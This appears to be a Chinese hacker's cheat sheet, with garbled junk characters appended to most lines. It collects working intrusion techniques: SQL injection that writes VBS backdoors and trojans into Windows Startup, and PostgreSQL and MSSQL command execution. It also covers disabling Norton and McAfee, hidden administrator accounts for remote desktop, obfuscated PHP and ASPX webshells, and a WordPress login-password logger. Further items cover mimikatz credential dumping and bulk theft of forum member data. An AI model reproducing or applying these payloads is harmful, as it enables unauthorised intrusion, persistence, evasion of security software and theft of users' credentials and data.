create table a (cmd text);' N5 C9 ~8 q0 M: u4 H
insert into a values ("set wshshell=createobject (""wscript.shell"") " );+ _6 \' X* t) n. G- `: H+ I
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );# ^# }6 ?% B h$ e+ P4 Q
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
7 t9 z, ]) S3 h. F5 ]4 Z, mselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
) `1 P& N; _, O- ]drop table a;
7 K3 C. X+ V+ D) Y: Z: [7 c( I$ j. ~ r. G: H3 C7 q8 ~
英文版本:) c; ^9 J, E2 x. J
# B B! |& x4 cuse test;
& b- y! r- A7 P$ ?% |+ C8 m3 @- ?create table a (cmd text);+ w5 e' f- E* T7 W0 P
insert into a values ("set wshshell=createobject (""wscript.shell"") " );9 Y/ J1 }. ^7 d$ F' H) P0 Z! Q
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );$ i( T" Y9 } X# L* `: \+ y0 n
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
5 P* [9 h5 K: h6 Tselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
& F6 C7 q& _( o! g: I$ W1 Wdrop table a;9 h5 [7 w- v! X( y" w2 W
7 u8 F! H) d# Wcreate table a (cmd BLOB);* V! `- e: e |* U9 o, u0 }
insert into a values (CONVERT(木马的16进制代码,CHAR));+ j& ~3 J4 s p% V5 Y
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
4 \# q5 f- _9 [) b' Hdrop table a;
+ B! g8 g, p, H6 q% W }: ^8 X% g3 w; [
记录一下怎么处理变态诺顿
: y! e; k: u9 A* @, }; F- r查看诺顿服务的路径
) E5 r( a0 M( M: ^0 g3 ksc qc ccSetMgr" h: `+ z/ t/ s. E" j$ K! Q
然后设置权限拒绝访问。做绝一点。。( m+ m- y" }& U8 p! x5 H2 i8 ^2 w
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system7 S9 l- M; z6 O% F. ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"1 z' c; W) B# J+ ~/ v
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators0 ~3 H' W+ B& w4 b( L0 L- b' S# Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone5 R) P9 i1 f$ q4 h: h! Q! b+ e
# ?: n0 R# H8 ?1 G+ k9 Z
然后再重启服务器
% t' @' n! p2 }iisreset /reboot
& H) @7 A/ `- Z% E! D/ K6 v8 y这样就搞定了。。不过完事后。记得恢复权限。。。。
9 H3 I0 t$ v0 [+ Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
9 P* R8 D% h/ G% e0 L* w2 U3 ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F* |* T$ D1 U2 I: r; Q& M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F$ Z# B* \) _; p: E' Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F$ V6 i4 |) h# j+ U! x9 d
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin* z, H4 P9 K; \. G: Q1 z/ c5 {
+ ~1 }8 ]- F9 y* a. m0 A: x' ~
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')/ R, b/ @! w# d
, g; p4 d: o# H& ]
postgresql注射的一些东西& I/ m% K Z* N
如何获得webshell
5 y' r: n& v+ w/ u0 g; x0 v7 V) f$ shttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
3 M2 s* B/ C* X* C$ H- a% Xhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
+ ?( ]! t' Y4 N# S$ S8 Z4 Ihttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;1 e6 E* O. ` b$ ~" j' u
如何读文件
# I' Q1 R7 V* _4 s; hhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
$ `% J$ a0 h; g6 B# Q% A) Uhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
# G; r' C4 n% K7 R4 K) Chttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
0 ~) `+ D. w2 v- a
' X/ |- c8 v7 P! N7 hz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
9 h1 k: C2 Q- D: B7 L当然,这些的postgresql的数据库版本必须大于8.X
- r" `' }2 P8 b" T2 {创建一个system的函数:/ O& d# U7 K: l
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT8 N v/ M" C7 }2 d% @
* t0 C3 p+ T7 S6 @% C9 ]- H
创建一个输出表:& B7 P/ s2 ]$ C' ^
CREATE TABLE stdout(id serial, system_out text)- [! s+ P5 n& d- j4 r9 k- X; w
7 G* y0 }) r/ B" K- ?& O
执行shell,输出到输出表内:
3 G! e& c8 U. v3 ?SELECT system('uname -a > /tmp/test')
( d: ?' r7 Y" D' S- W
+ @& ?$ {- H# v# V8 @copy 输出的内容到表里面;
, E6 S8 t! i1 j+ g2 bCOPY stdout(system_out) FROM '/tmp/test'7 x& l% J" L* p- h
" Q% m# K: ?9 V从输出表内读取执行后的回显,判断是否执行成功9 _2 F$ e+ U# |6 o' Y5 }
1 f7 W3 H9 E$ tSELECT system_out FROM stdout
3 U( J9 d9 _9 A下面是测试例子
* w" k2 o- A5 p
( x$ T% t& v& N6 A/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
; G/ @0 {0 V0 w9 F1 n3 N# _
* l" R# C" q+ c& a/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'9 a4 `( y* ]" R% E
STRICT --9 L: | a# @! F9 q1 \
+ m o" j! O+ O/ N0 F/ i
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
& ~, v. a0 n" P" T* V" C* h1 ]. l+ v5 N
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
+ H" z1 y4 J* a" s" f* [
* Z. F% q$ z5 v# I \6 R/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--* d E7 `% Q" i- Q4 Z/ V4 |3 z
net stop sharedaccess stop the default firewall, C6 L. Y- [( o
netsh firewall show show/config default firewall% X) ~8 T5 l, Z: @. C x( _
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall8 y$ s. R# J0 G7 K
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall7 P2 u% X4 x) H2 F4 X5 F9 A) ]
修改3389端口方法(修改后不易被扫出)
9 j1 T* u) l. V, c8 i修改服务器端的端口设置,注册表有2个地方需要修改( u: ]9 A) [: r" ]" H. A( T
9 f: x& m9 c* h5 U. |[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
2 n v7 l5 F8 {9 w, FPortNumber值,默认是3389,修改成所希望的端口,比如6000% a" j! b2 r; L3 f3 l
6 B. g) B' L$ f6 F( |7 H2 {! Z第二个地方:) M* F$ Z% N3 V& O# c4 j/ o' P
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 2 l, H& E4 x. @. R2 H6 x) L
PortNumber值,默认是3389,修改成所希望的端口,比如6000
6 D- r! e5 I& Z. W5 V5 @3 Y; u, L. C
现在这样就可以了。重启系统就可以了
j( ~5 [( B# i4 q6 p
; R; s9 h4 T. v F7 H* q z& _" Y查看3389远程登录的脚本: E2 {0 z1 |2 M2 ]' g0 {' M3 u$ h
保存为一个bat文件# O( |( v- l8 u' ^6 |/ g% S \
date /t >>D:\sec\TSlog\ts.log% t% F; u' h) _9 q& w0 h
time /t >>D:\sec\TSlog\ts.log
6 K- v" I, z, g) T8 u2 G2 H1 T1 jnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
) j- X) V$ [0 b- S% estart Explorer& i& c- b0 D- N" Z
. P# z4 h- `% V, u9 m/ n
mstsc的参数:, k1 c D) P+ h4 n' L& P
2 Z8 \" w& p! S8 p3 Z. T2 W9 ~
远程桌面连接8 ]7 G) l; }8 l
- e! P5 j0 B% C( T. y5 H iMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]6 N0 O/ K7 c+ A" o" q" F5 @
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
I6 g8 i9 V1 _0 r1 _: D
6 p0 c# o; _$ Z( j H<Connection File> -- 指定连接的 .rdp 文件的名称。
6 |* D6 B$ \& \3 I) d! j4 m1 D4 u m( O
/v:<server[:port]> -- 指定要连接到的终端服务器。 `( n# z W8 O: m1 V
$ @. h; `+ n# Y! j% s/console -- 连接到服务器的控制台会话。( O0 [2 a) }/ D) u1 I ^: E/ s
. j: a4 B v% y9 J4 v- [" e/f -- 以全屏模式启动客户端。$ p; }* H& S& w8 i: e' U
% F w* C) s: s! X: j/w:<width> -- 指定远程桌面屏幕的宽度。) R7 z2 t# z8 L3 t1 A, F b
" U& }% i" W* l: Y6 u# n: {+ P/h:<height> -- 指定远程桌面屏幕的高度。5 R1 _8 x8 D/ y. m( a* q/ @
, V7 r% O" [7 s) r* j/edit -- 打开指定的 .rdp 文件来编辑。, `) G0 ^" T0 c$ ~. {6 T
1 y+ o7 l0 h- q4 `2 [/migrate -- 将客户端连接管理器创建的旧版! N9 |4 @$ _; l Y0 ^* B
连接文件迁移到新的 .rdp 连接文件。
( b. ]- d* }3 P5 q/ h, i% _& X$ e0 t/ K. z) j" T# S
0 }" N4 u! T9 _其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就& h5 k* i9 {; L7 @
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
' Y5 L' J2 A/ {' k+ @) |- o! a. f* C6 ~& v9 f( l t
命令行下开启3389$ q/ D% g9 v+ X5 ]1 k9 S2 I3 h2 @
net user asp.net aspnet /add- ]1 j' ~+ l; k/ f5 X0 U' F
net localgroup Administrators asp.net /add" q- Q& @- u, k
net localgroup "Remote Desktop Users" asp.net /add: }+ n2 I% k5 ]. j
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
8 K. g) B' C9 y" G. W* hecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
" M) Y+ j) ]# U, h5 _/ _3 O! Mecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
; }) x: M* m8 i/ p6 B" u) necho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f3 `) y/ z% W q6 k8 ]+ S
sc config rasman start= auto
" c k# o4 G& F( o4 F# asc config remoteaccess start= auto
! O# P p* \; P) J9 inet start rasman0 A; ?* D1 p0 D# m# }9 A% }
net start remoteaccess0 D' A+ M: m7 y- z7 S7 ~3 l
Media
& U0 o* L3 {5 c3 ~) B( C1 I9 t& L<form id="frmUpload" enctype="multipart/form-data"
0 }6 n9 ^3 W8 f/ B1 p* ~action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br># s6 b) o! j" Q4 G: y" _9 _
<input type="file" name="NewFile" size="50"><br>
. O. Q& @- ]) N. J<input id="btnUpload" type="submit" value="Upload">1 h4 I2 {( O: `8 o0 s5 }3 }
</form> U( |0 [) q: `( D# V
" b6 I/ ~/ {( h4 V, Kcontrol userpasswords2 查看用户的密码. Z5 F5 U9 x+ g: |
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径* G; w! @/ e# \' B* a7 q" L4 X
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
9 V- }- F4 V/ c9 ]) }8 I" L
! M1 `9 a4 m) H! I141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:& Y& R; e$ e7 g4 J: Z* Q
测试1:
; Q& s q* T, l& F) iSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1" H3 _: q$ l4 n; L
3 s, E y7 c5 w2 W# `- X测试2:
2 B$ y/ {8 J$ g! T) E& }3 w/ Z) a3 Y5 l
create table dirs(paths varchar(100),paths1 varchar(100), id int); E% E: O, _; H9 }
2 F% p/ a" R6 z. u4 j/ S
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--5 `9 Y. Q1 o) ], n. x ]7 r
4 \+ o8 U' H9 ]8 A" P
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1: V, ]5 i$ `! c8 @ W% G
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
- o( S: A& P* o$ M可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;( P5 Y2 }% s. m- p$ l
net stop mcafeeframework& U( g' C! o+ R6 f- u0 l
net stop mcshield+ P. a( ~3 {6 s
net stop mcafeeengineservice) Q* }- ~7 ?3 Q( ^' V& C& X
net stop mctaskmanager
5 _1 ~+ J" c9 Z% p+ Khttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D4 c/ e2 P, a" g2 b: @$ P3 s
3 T! c' E3 \6 v3 L VNCDump.zip (4.76 KB, 下载次数: 1)
2 E/ M' X# P/ @密码在线破解http://tools88.com/safe/vnc.php
0 z: w* T( ]" H+ B9 B# AVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
& H/ J$ ^' D# u! }; z! N D Q. B* z2 A- F: h& a
exec master..xp_cmdshell 'net user'% e9 d/ H/ l1 ]2 R
mssql执行命令。
: e5 }" t- s7 y+ _7 U3 ?获取mssql的密码hash查询
. T. f" B2 n, u3 |6 sselect name,password from master.dbo.sysxlogins
3 l6 [: R) S# r6 M- q
9 g# x& \" g qbackup log dbName with NO_LOG;4 B) n/ P# g& z; C5 n0 p2 s! q- M
backup log dbName with TRUNCATE_ONLY;; i# A& s! O Z) ?, L( d/ w
DBCC SHRINKDATABASE(dbName);4 k6 I, W" e2 Y x4 ?5 C
mssql数据库压缩
7 N8 j; v/ l1 }! q! B8 {- y) b0 Q
/ ~7 r% S8 a/ @( ?$ `Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK! m- d6 y( J* T+ m; y4 k$ A
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
* f8 H( J: V* I( S8 ]9 a k8 l% H% K% s3 U$ v
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
' ?. V0 C# ^4 y i* q备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak0 W5 l- O9 d' w! S N) v
; u; B" q- J( K% @8 w* t
Discuz!nt35渗透要点:
/ i/ ~3 ^( h4 h% H6 `! W(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default' k. v( N+ e9 D0 T+ e
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>' V6 e3 p# i% Z$ U' {) c7 H
(3)保存。: m9 W0 S" I8 F+ k" j2 A4 T/ `" `- {* o
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass0 n/ U2 Y7 p' z* |* N) m, o5 K/ X
d:\rar.exe a -r d:\1.rar d:\website\
9 s5 D4 \& r; N6 y: B7 X( l; s, }递归压缩website& h2 ^, o/ i, F
注意rar.exe的路径
1 k! O; a# O9 p) U, n( n6 P& A7 \2 L/ F# I" D# d
<?php, V8 Z; p- O* D! }' p
4 s* B0 g* Z- F5 M$ z+ p
$telok = "0${@eval($_POST[xxoo])}";
) [5 x7 g9 U4 ?3 o( |
, W2 Q5 M( k! V0 q, p$username = "123456";% M$ k; t2 e+ a& K- \0 Q' m4 G
) ]) A' w& x1 x/ l9 U% V( z$userpwd = "123456";
2 E5 T' |' S, H9 f7 ^
; x; @8 z# ~3 g$telhao = "123456";. g1 A0 l$ w& z2 M- P9 C
4 p9 w8 Q8 K5 p7 S5 r% [/ j& S$telinfo = "123456";% b) F8 `; F. ]
5 c0 }' }2 _ Y" _1 ^% p8 M, J+ s
?>1 |8 l7 W1 ^3 c, v
php一句话未过滤插入一句话木马1 ]2 `9 N. z9 j0 w) r% I" R
5 X4 x! r8 E% L1 |) u1 F站库分离脱裤技巧+ g9 h$ a% o0 L8 V! _+ }7 [
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
. @! q4 r6 x; k; b8 Zexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'- M9 Y1 g1 |1 W+ r$ a
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
) M9 R3 U: T$ c& q8 k% i( r) p这儿利用的是马儿的专家模式(自己写代码)。
# Y" |" q+ \) J& H+ L$ Z) Mini_set('display_errors', 1);. J' X3 u' E# L0 I: W
set_time_limit(0);
% C( v- _9 ^4 _error_reporting(E_ALL);& t* A. s% U4 T' @
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
o, h* V6 o J: o4 Jmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());9 e. W& U. f$ o5 W
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
# a! x. y2 @+ S$ F9 Q) G! l$i = 0;
! S5 R' K+ l6 N; _& U/ A$tmp = '';
" D* ]9 N0 b! P) x: S- Zwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
, c% {, U. V+ H' s $i = $i+1;8 e, V( M8 i8 Y' U' e/ N; ]
$tmp .= implode("::", $row)."\n";7 @1 f1 d( {4 _4 k: c
if(!($i%500)){//500条写入一个文件8 [. O. S+ L5 |% J; F2 M! v
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
+ e2 c. u! j3 F0 F1 ]0 t5 R file_put_contents($filename,$tmp);) X8 s6 ?2 h* I
$tmp = '';
5 ~) S, |; j1 W. D }
. x& ^4 Q0 ^+ }2 S8 m; Q}
2 R" b8 x( A- R2 A2 Tmysql_free_result($result);
% ^0 e2 I9 l3 q/ o' a2 F
: }+ Y$ n6 F/ S" Q9 @$ k, i5 ?: P! y5 Y$ s7 W
' v0 G* H4 u' I7 q. S5 ]
//down完后delete
/ x+ R+ H; i5 \9 m6 k1 S: ?
6 k6 A8 ?1 P7 g; B- M6 v3 d0 ?
4 Y* g3 d( Z6 \+ Z+ F1 M) {6 s1 uini_set('display_errors', 1);7 o* }3 E+ \. o
error_reporting(E_ALL);
4 @. w. U; }5 B6 G/ @; R0 p4 X$i = 0;
. Z4 p" d6 u! r" u; o+ c; G# B/ Y6 Rwhile($i<32) {
1 `: o o# G9 |1 ^ $i = $i+1;3 m& E5 [. `/ } z) a
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
; w2 Y3 B8 f9 x! w% b6 C unlink($filename);5 N' ?: s7 ^! u
}
3 v) a8 q7 ]' M( H1 S5 ^httprint 收集操作系统指纹. A& K5 f) O% y" `' _( E' F
扫描192.168.1.100的所有端口
2 D+ \% K, ]* }- N8 v6 B/ O, anmap –PN –sT –sV –p0-65535 192.168.1.1007 V0 \8 {$ e% ]% c* L$ N
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
) p* D8 [) e8 M0 r( r% F; B: [host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输0 X7 ]8 ^$ R, j. T: A1 N( W
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
: u6 P! `# D" h( X
2 d. `. t! Y( F, \- V$ j6 }Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
( z5 k/ I$ q8 ~7 b5 R
/ R, s0 y( ?, H, Q1 ` MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号), S& C/ X% l' |) A8 [ \( ?
3 l. v' S, _0 y* N) L" \) v7 C i( F Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x/ a" G+ m8 P) `
5 W5 C. C$ L: w; s, W$ z
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)! ]* E3 {. }5 G9 A9 m8 y
- Z; M. e5 G8 i* {
http://net-square.com/msnpawn/index.shtml (要求安装)
3 F! z7 g6 t* J4 a0 t) Q \ j, E2 ~, `9 U$ M
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的). o8 b0 o3 O' j. P; W
" Y- H# _' r/ J( A& p; Z
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
1 K$ n9 d3 ~/ d" M dset names gb2312 ? G( P) v# _9 b; |: k- U
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。3 w, E$ J# \+ F$ Q8 Z# |* I
# S8 K" Z9 _" K* m9 p" B: f
mysql 密码修改. P1 L1 i4 s# e6 ]
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
& M5 i, J0 U) J! yupdate user set password=PASSWORD('antian365.com') where user='root';0 v$ A; w" n* l& b
flush privileges;
& n8 n* l) g w. c0 m/ H- F高级的PHP一句话木马后门
* v( G3 p# ]9 H0 U* O6 _) L: ]# K( }9 f% `6 D1 m
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
1 j+ g5 N- E/ n! M H* N! y" p( x- h% Y& x N: l9 T( q: w! S
1、/ z& J( b1 q- l+ N
# T, c/ ^) z( N" [$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 l! L; D" U }) U! G
6 w7 Y# F0 Y! y
$hh("/[discuz]/e",$_POST['h'],"Access");2 L. m& ~7 a7 h! m( M7 t; w* H
7 c( R4 N& U. d* t C//菜刀一句话$ J" j+ K+ m6 D, d' U
9 U& _' t. h' s! T/ U2、3 M0 e$ k& S7 T5 W: C; t8 z. n
, n/ Q6 P7 y6 \. @5 \0 ?
$filename=$_GET['xbid'];
5 ]; ]% G* j/ v; h: z i8 _1 x2 A/ H5 C: X$ C. Y0 m* \
include ($filename);: Q4 y& Q! k" H
0 n7 u% d( a, h
//危险的include函数,直接编译任何文件为php格式运行3 L/ B' h, N5 r
6 j0 \ a$ y, H& `; n: i6 W3、
" y1 F, M6 F# z1 h5 g# n# f8 i. u
}* S# z# n5 E F" `. g$reg="c"."o"."p"."y";
; Z7 N( m9 U( n* \$ R
- c+ V Q4 N; V8 j$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
9 a* U0 i2 T! G' Q( D# D+ r( k6 j! h$ d
//重命名任何文件
# O" z3 p: n, w+ w% y# S0 N3 k ~$ u! z
4、
5 L0 G8 S3 l8 V/ X7 J+ ^) N& E' b l d+ v
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";& g: D# _( |; E. }
7 N g& i f4 K" _) I F
$gzid("/[discuz]/e",$_POST['h'],"Access");4 s& d7 Y( G: P5 D) Q/ N5 N
. ]! `) q& p' L- T5 m8 A//菜刀一句话
- o# |4 u1 T2 k! z4 Q- l
* {4 H, N; c5 Q. z5、include ($uid);
; e& v, S$ A' Z& [) g' r e- Z; m7 X
//危险的include函数,直接编译任何文件为php格式运行,POST
J: w% B9 \3 Q6 [+ s1 ]
5 O o/ F" g5 }8 e# E9 p3 g- J# e/ q8 F ^1 _: N3 ~7 n/ r- ]
//gif插一句话
3 E* A& B8 r$ P7 \) J' F& c
4 N9 [, |( j# ~% p1 t# t6、典型一句话& t$ d A- X7 y0 h$ M' n3 A# c
1 Q' h+ ]; J3 m1 S" x! d2 z程序后门代码
) j8 C7 y7 Z2 d; o) }<?php eval_r($_POST[sb])?>
n/ M; n( Z2 m9 r程序代码
6 ^; K" Y4 t7 g5 Y" H/ ^6 P9 d. Y<?php @eval_r($_POST[sb])?>
* ~- m4 ^1 N1 h3 w6 |8 P z7 z$ G! f//容错代码
2 V& e7 p6 o1 u程序代码/ k. j6 {$ o( N- O- O! h
<?php assert($_POST[sb]);?>6 Y# K& T6 n* }! B x4 D
//使用lanker一句话客户端的专家模式执行相关的php语句7 w0 ^7 S& Q, r% K6 D% l$ `; J
程序代码: x3 K. V& v7 _
<?$_POST['sa']($_POST['sb']);?>- _/ t5 ]" V4 b2 B" H; \7 @
程序代码# {0 x9 X4 |# V- T6 k2 F, {+ D# a
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?> |, f/ H# s; L* S- ~
程序代码
1 Q; @8 }# x& U! q; P' p/ g ]<?php
2 g; A, h) X6 [! W& n; _5 [3 Z6 b@preg_replace("/[email]/e",$_POST['h'],"error");
/ y" R W; {' [: y% C?>
& C6 ?9 l5 D: O9 K' f4 |//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入2 @5 R4 m! ^9 w
程序代码
- U/ {7 E2 W9 f: \1 s% \) g4 r<O>h=@eval_r($_POST[c]);</O>* \: U! _8 i0 Z
程序代码5 Z% C& b0 a) i4 C; s5 i! R( s( _* ^/ X
<script language="php">@eval_r($_POST[sb])</script>! G0 ?3 \: q) c! N# X) m- |' X6 |
//绕过<?限制的一句话1 i7 q3 ^& w4 G1 k
E( ~1 R2 M3 K' ]8 z$ n
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
9 h0 O( [8 m& `2 Q2 F/ L详细用法:' r* q1 p L+ d6 X5 K9 {: a
1、到tools目录。psexec \\127.0.0.1 cmd
# _# V2 G& [& w" l7 a2、执行mimikatz
- @6 U7 w- r! J9 y" @8 Q3 |3、执行 privilege::debug Y! }5 H+ Q$ P1 k- s. m) V! h
4、执行 inject::process lsass.exe sekurlsa.dll
7 N: t4 q1 M1 {5、执行@getLogonPasswords. {" A( _4 h' R/ V7 b6 O* W
6、widget就是密码
! t s/ } |$ W# I2 R; B7、exit退出,不要直接关闭否则系统会崩溃。
+ {* U$ s4 }% K' c
. n% D# [, }" Q. Khttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面4 T5 ?6 P6 G2 J0 I! C0 q
" G" P0 T- o5 _自动查找系统高危补丁
% J; ]% a( ]7 [systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
O- I9 h0 D3 g2 f; s) m! ?: W q. q3 b
突破安全狗的一句话aspx后门- m" @" H2 I1 D
<%@ Page Language="C#" ValidateRequest="false" %>% x6 q7 ~& Q) r7 o2 u
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
% ^7 ]! A* g7 awebshell下记录WordPress登陆密码/ L3 a `9 ?9 Y
webshell下记录Wordpress登陆密码方便进一步社工
! p. u3 l( |7 O; s+ y/ f在文件wp-login.php中539行处添加:
) L. [0 b }' F6 _2 `// log password. Q M6 V+ E+ a. ^: B* Y
$log_user=$_POST['log'];
5 ]. P' Z" ?! H( z9 b: t8 p$log_pwd=$_POST['pwd'];# [5 E2 h; A' C3 n: w1 ?7 E" T+ V
$log_ip=$_SERVER["REMOTE_ADDR"];5 G$ k5 x+ h' a5 m9 g& K. v$ q) O. t
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
5 m3 F$ r2 Y& A$txt=$txt.”\r\n”;
( D; S& t9 |& k6 t" Iif($log_user&&$log_pwd&&$log_ip){& J9 |5 N/ a2 E" d- J' l0 B) e1 ` ]$ P
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
# ]" Y% n/ X0 Z* O}2 G+ y; D+ C7 c
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
$ R6 H! @* l' n3 B3 q7 e就是搜索case ‘login’
, f4 s5 u9 x& u+ d/ E在它下面直接插入即可,记录的密码生成在pwd.txt中,8 F# K# z3 D- f% s
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
; S/ c# @1 N$ _利用II6文件解析漏洞绕过安全狗代码:0 ~7 z7 s! P4 o; M7 l B: Y
;antian365.asp;antian365.jpg: Y$ F4 d, V* U4 v$ u% L8 J9 t
' M+ f( v9 k0 j3 g2 m- d% k, |$ m各种类型数据库抓HASH破解最高权限密码!
